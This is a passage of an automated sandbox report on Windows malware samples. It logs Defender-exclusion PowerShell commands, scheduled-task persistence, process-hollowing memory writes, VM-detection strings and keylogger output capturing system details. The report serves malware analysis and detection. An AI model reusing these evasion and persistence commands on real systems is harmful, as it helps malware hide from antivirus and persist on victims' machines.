                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595489
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595227
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594994
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594854
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594749
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594640
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594531
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594422
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594312
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594203
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599546
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599327
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598999
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598671
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598452
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598342
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597996
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597871
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597747
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597640
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597531
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597422
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597312
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597202
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597091
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596984
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596874
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596765
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596435
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596218
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595671
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595439
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595312
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595202
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595045
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594934
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594703
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594484
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594374
                    Source: GedTanqRR.exe, 00000009.00000002.1850209751.0000000001502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: GedTanqRR.exe, 00000009.00000002.1850209751.0000000001502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: sgxIb.exe, 00000013.00000002.2969662977.000000000145A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz%
                    Source: s2Jg1MAahY.exe, 00000008.00000002.2971025990.00000000015E5000.00000004.00000020.00020000.00000000.sdmp, GedTanqRR.exe, 0000000D.00000002.2969620558.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, sgxIb.exe, 00000019.00000002.2969546365.0000000000D79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe"
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GedTanqRR.exe"
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GedTanqRR.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory written: C:\Users\user\Desktop\s2Jg1MAahY.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeMemory written: C:\Users\user\AppData\Roaming\GedTanqRR.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory written: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory written: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GedTanqRR.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpF8DD.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Users\user\Desktop\s2Jg1MAahY.exe "C:\Users\user\Desktop\s2Jg1MAahY.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpE4A.tmp"
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess created: C:\Users\user\AppData\Roaming\GedTanqRR.exe "C:\Users\user\AppData\Roaming\GedTanqRR.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmp30F5.tmp"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmp50A2.tmp"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: s2Jg1MAahY.exe, 00000008.00000002.2977044627.000000000337D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q8<b>[ Program Manager]</b> (11/01/2025 03:39:12)<br>{Win}THcq
                    Source: s2Jg1MAahY.exe, 00000008.00000002.2977044627.000000000337D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: s2Jg1MAahY.exe, 00000008.00000002.2977044627.000000000337D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q
                    Source: s2Jg1MAahY.exe, 00000008.00000002.2977044627.000000000337D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q3<b>[ Program Manager]</b> (11/01/2025 03:39:12)<br>
                    Source: s2Jg1MAahY.exe, 00000008.00000002.2977044627.000000000338C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <html>Time: 01/24/2025 06:41:35<br>User Name: user<br>Computer Name: 745481<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 8.46.123.189<br><hr><b>[ Program Manager]</b> (11/01/2025 03:39:12)<br>{Win}r</html>
                    Source: s2Jg1MAahY.exe, 00000008.00000002.2977044627.000000000337D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q9<b>[ Program Manager]</b> (11/01/2025 03:39:12)<br>{Win}rTHcq
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Users\user\Desktop\s2Jg1MAahY.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
